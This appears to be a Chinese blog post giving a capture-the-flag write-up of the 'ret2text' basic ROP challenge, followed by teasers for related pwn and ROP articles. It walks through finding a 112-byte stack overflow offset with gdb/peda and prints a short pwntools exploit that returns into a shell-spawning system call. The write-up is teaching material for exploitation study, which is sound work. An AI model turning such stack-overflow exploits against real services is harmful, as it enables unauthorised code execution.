pwn——basic rop1

最新推荐文章于 2024-10-28 16:34:35 发布

原创最新推荐文章于 2024-10-28 16:34:35 发布 · 451 阅读

0 ·

CC 4.0 BY-SA版权

pwn——basic rop

（ret2text）：
老规矩，先checksec一下：
在这里插入图片描述

发现开启了NX，堆栈不可执行
放入ida中：

发现存在get函数，可溢出：
查看其他函数，发现在secure中存在完整控制台：
在这里插入图片描述
很容易找到system地址：

下面在gdb里面动态调试找到偏移量：
在这里提一下，peda里面的pattern create number命令可以整出一堆完全固定混乱的数字，在输入时，将这些复制进去

程序异常，可以在最后一行看到异常地址，通过指令pattern offset 0x41384141查找异常处的偏移量
在这里插入图片描述
这里是十进制偏移量112
下面是exp,很简单:

from pwn import *
sh=process('./ret2text')
sys_addr=0x804863A
payload='a'*112+p32(sys_addr)
sh.sendline(payload)
sh.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

逃跑的木偶大人

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

PWN学习笔记（一）Basic Rop

weixin_44120526的博客

12-26

462

此学习笔记主要基于CTF WIKI 中的Basic rop部分。网址为：https://wiki.x10sec.org/pwn/linux/stackoverflow/basic-rop/ -------------------------------------------------------------------- 首先翻译了一下文章的开头，内容为：打开NX保护后，很难继续直接将代码注入堆栈或堆中。攻击者也提出了相应的绕过保护的方法。目前最主要的是面向返回的程序设计。主要思想是基于堆栈.

Basic rop学习

I'm five的博客

12-26

1300

Basic rop学习基本ROP简单例题：cgpwn2分析：exp：基本ROP 主要思想是在栈缓冲区溢出的基础上，利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值，从而控制程序的执行流程。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets)，这就是我们所要说的 ROP。 ROP 攻击一般得满足如下条件：程序存在溢出，并且可以控制返回地址。可以找到满足条件的 gadgets 以及相应 gadgets 的地址。简单例题：cg

参与评论您还未登录，请先登录后发表或查看评论

basic rop3-rop

taopaode的博客

03-11

434

pwn——basic rop （ret2system）：老规矩，先checksec一下：开启了NX,堆栈不可执行，这里提一下，复制文件进虚拟机之后最好改一下权限，命令是： chmod 755 name 放入ida中：发现get()函数，可以溢出这里与上一道题不同的是NX保护，所以我们无法通过在用户态的栈里写入一些类似system()的命令，所以我们要往内核态的栈里面写，但两个栈内存上是独...

pwn学习资料整理——ROP技术（pwn_rop1）

08-30

pwn学习资料整理——ROP技术（pwn_rop1）

pwn3-绕过防御-ROP(1)

qq_73667990的博客

06-08

1018

*ROP：**全程Return Oriented Programming(面向返回的编程)，在栈溢出基础上，利用程序中已有的小片段(gadgets)，改变寄存器或变量的值，从而控制程序执行流程，从而绕过NX防御，常见有ret2text,ret2syscall,ret2libc(最常用)…**gadgets：**以ret结尾的指令序列，通过这些序列可以修改某些地址的内容。ROP攻击满足的条件：1.存在溢出，且可以控制返回地址2.满足条件的gadgets。

PWN栈溢出基础——ROP1.0

Gifoyle的博客

07-13

1053

PWN栈溢出基础——ROP1.0 这篇文章介绍ret2text,ret2shellcode,ret2syscall（基础篇）在中间会尽量准确地阐述漏洞利用和exp的原理，并且尽量细致地将每一步操作写出来。参考ctf-wiki以及其他资源，参考链接见最后，文中展示的题目下载链接见评论区 1.ret2text ret2text即控制程序执行程序本身已有的代码（.text）。其实，这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码（也就是gadgets

glibc 2.35 pwn——house of kiwi示例程序

CoLin的pwn小屋

12-29

1279

house of kiwi演示程序

缓冲区溢出 - ROP 基础

weixin_46099552的博客

10-28

1248

ROP基础

Pwn基础学习1-[栈溢出]/篇2

m0_52343643的博客

03-29

2561

继上一篇的内容题目3-ret2syscall 定义控制程序执行系统调用原理不同于之前的 ret2text 和 ret2shellcode 题型，系统调用并不是执行程序中现有的代码或自己写进去的代码，其实就如其字面意思，系统调用就是我们让系统来调用一些函数，那么如何做到让系统来调用，需要满足以下几个条件：某函数的系统调用号【系统调用号表】—— 放在寄存器 eax 需传入某函数的参数 —— 放在寄存器 ebx、ecx、edx 一个指令 —— int 0x80 int 0x80（软中断）

basic rop-ret2shellcode

taopaode的博客

03-10

328

pwn——basic rop （ret2shellcode）：老规矩，先checksec一下：发现啥都没开放入ida中：查看源代码发现存在get函数，存在溢出查找控制台，发现没有，当然题目已经告诉没有了，但是在这里我们发现了一个函数strncpy, 它的功能就是将第二个参数里的值按第三个参数大小复制到第一个参数里面，进入buf2里查看，发现buf2在bss段里：在这里我们通过gdb...

栈溢出----基础rop

qq_42192672的博客

10-12

1266

学习文献：https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic_rop/ 1. 栈溢出基本原理就不写了列举一下常见的危险函数：输入 gets，直接读取一行，忽略'\x00' scanf vscanf 输出 sprintf 字符串 strcpy，字符串复制，遇到'\x00'停止 st...

上一期文章说的关于PWN入门常见的问题

mumuzi的博客

07-29

3870

我要是有地方说错了一定要指出来啊嘤嘤嘤虽然是从我自己的角度来理解的，但是估计应该大概还是有帮助的(吧)。自己想的和群友提出来，涉及的问题有：师傅，怎么入门pwn啊那个canary保护机制，为什么说是覆盖低字节来得到canary，没理解到。反正就只知道是大概这种方式来得到canary plt和got是什么关系啊，为什么写payload的时候有时候在前，有时候在后，有时候又重复出现这样的，没搞懂为什么要用puts而不用printf(他意思是ret2libc的题) 格式化字符串里的$是啥意义啊 1.

pwn学习-中级ROP-1

WocW的博客

03-03

1138

CTF-wiki-中级ROP实例复现 ret2csu libc_csu_init函数 ctf-wiki上的 .text:00000000004005C0 ; void _libc_csu_init(void) .text:00000000004005C0 public __libc_csu_init .text:00000000004005C0 __l...

pwn学习资料整理——ROP技术

recover517的博客

08-30

5844

1. 在32位程序中，参数是以什么形式进行传递的？ 2. 在64位程序中，参数是以什么形式进行传递的？ 3. 什么是return address？ 4. 怎么利用控制栈空间来达到执行程序命令？ 5. 32位中构造ROP 6. 64位中构造ROP

pwn1及ROP总结

weixin_44464829的博客

11-08

643

Babystack 本题，用 checksec 检查二进制，发现开启了 CANARY、NX、以及 RELRO 保护，CANARY 是用来检测栈溢出的，canary 是一个随机数，存储在栈里。程序通过对比栈里的 canary 值和读取到的实际 canary 值进行对比，如果不相等，则抛出异常。因此，为了绕过 canary 机制，我们需要先想泄露 canary 的值，然后利用栈溢出，把这个值放到 payload 中对应的位置里，这样，程序发现 canary 的值没变，我们就成功绕过。

ROP之gadgets分析记录

inquisiter

12-31

1174

申明这篇和上两篇是我学习蒸米《一步一步学习ROP》系列文章的记录个人感觉这一系列文章关键就是泄露write地址，其他的根据这个泄露利用_dl_runtime_resolve+0x35和__libc_csu_init处的gadgets来实现代码__libc_csu_init处的gadgets的只能实现三个参数的调用、 _dl_runtime_resolve+0x35处的gadgets可以实现六个

PWN入门系列（3）ROP的利用

小心信科理化声

12-04

2433

ret2shellcode 原理 ret2shellcode,即控制程序shellcode代码。shellcode指的是用于完成某个功能的汇编代码，如：call等，常见的功能主要是获取目标系统的shell。如果想执行shellcode，需要对应的binary在运行时，shellcode所在的区域具有可执行权限。举例还是以bammboofox的ret2shellcode为例附：ret2shellcode 第一步还是进行checksec giantbranch@ubuntu:~/Desktop/PWN$

基本ROP

听鬼哥说故事

08-29

8951

随着NX保护的开启，以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护，目前主要的是ROP(Return Oriented Programming)，其主要思想是在**栈缓冲区溢出的基础上(这一条之后不再重复提及)，通过利用程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值，从而改变程序的执行流程。**所谓gadgets就是以ret结尾的指令序列，通过这些指令序列，我们可以修改某些地址的内容，方便控制程序的执行流程。

（26页PPT）基于大数据的某省市智慧中心建设.pptx